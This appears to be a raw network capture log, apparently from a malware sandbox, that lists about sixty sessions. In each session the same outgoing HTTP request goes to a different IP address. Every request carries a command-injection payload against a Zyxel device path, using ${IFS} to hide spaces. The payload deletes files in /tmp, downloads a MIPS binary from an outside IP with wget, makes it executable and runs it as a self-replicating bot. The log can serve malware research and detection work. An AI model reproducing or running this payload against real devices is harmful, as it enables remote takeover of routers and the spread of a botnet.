                                            Feb 2, 2024 06:21:01.411716938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1430192.168.2.153782095.200.64.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411744118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1431192.168.2.1535850133.197.234.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411770105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1432192.168.2.155928832.65.124.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411806107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1433192.168.2.153981446.133.202.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411806107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1434192.168.2.1539000179.134.196.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411849976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1435192.168.2.155962284.140.59.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411890984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1436192.168.2.154479854.238.65.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411921978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1437192.168.2.1547578133.36.213.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411974907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1438192.168.2.153437087.252.236.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412007093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1439192.168.2.1547842190.198.198.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412070990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1440192.168.2.1553052101.92.170.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412101984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1441192.168.2.1552958200.151.255.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412130117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1442192.168.2.1536520115.82.161.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412193060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1443192.168.2.154835858.56.69.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412225008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1444192.168.2.1559158182.85.30.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412250996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1445192.168.2.1545724217.239.151.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412307978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1446192.168.2.1543066180.180.177.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412343979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1447192.168.2.1535760173.34.48.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412381887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1448192.168.2.154740662.152.149.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412417889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1449192.168.2.154083250.242.32.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412477016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1450192.168.2.1559562191.7.214.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412493944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1451192.168.2.155828481.188.118.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412554026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1452192.168.2.1537060153.219.92.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412585974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1453192.168.2.1542604176.25.153.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412614107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1454192.168.2.1546974124.73.137.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412650108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1455192.168.2.1560454220.128.72.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412694931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1456192.168.2.1552742139.111.142.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412709951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1457192.168.2.1538380211.160.226.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412774086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1458192.168.2.1556416211.23.208.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412817955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1459192.168.2.1560570170.235.98.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412846088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1460192.168.2.154808093.222.249.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412900925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1461192.168.2.155158265.60.208.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412925959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1462192.168.2.155174682.36.81.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412951946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1463192.168.2.1535376192.246.99.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.412988901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1464192.168.2.15527241.19.52.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413031101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1465192.168.2.154193287.173.93.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413113117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1466192.168.2.1548900126.147.38.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413141012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1467192.168.2.155031018.62.54.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413201094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1468192.168.2.155870851.181.3.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413223028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1469192.168.2.1547524141.212.17.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413270950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1470192.168.2.1538586133.224.69.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413301945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1471192.168.2.1551216154.92.28.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413347960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1472192.168.2.153586619.26.75.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413384914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1473192.168.2.154421264.124.6.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413413048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1474192.168.2.1555144162.89.6.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413464069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1475192.168.2.1560582147.240.179.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413491011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1476192.168.2.1558126103.4.189.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413527012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1477192.168.2.153851066.57.15.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413561106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1478192.168.2.155137897.248.151.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413604021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1479192.168.2.1534672141.3.91.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413661957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1480192.168.2.1549654193.29.193.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413710117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1481192.168.2.155309299.14.47.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413750887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1482192.168.2.155007481.176.116.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413799047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1483192.168.2.1538374177.49.104.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413822889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1484192.168.2.156099297.154.147.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413857937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1485192.168.2.154689893.217.220.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413919926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1486192.168.2.1544262123.237.130.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413959980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1487192.168.2.1554314105.121.157.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.413990021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1488192.168.2.1547670108.136.70.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414026976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1489192.168.2.1551002197.174.163.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414052963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1490192.168.2.1556094151.167.242.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414097071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1491192.168.2.155363441.198.143.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414123058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1492192.168.2.1559814189.86.143.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.414156914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1493192.168.2.1557710128.81.11.131443
                                            TimestampBytes transferredDirectionData
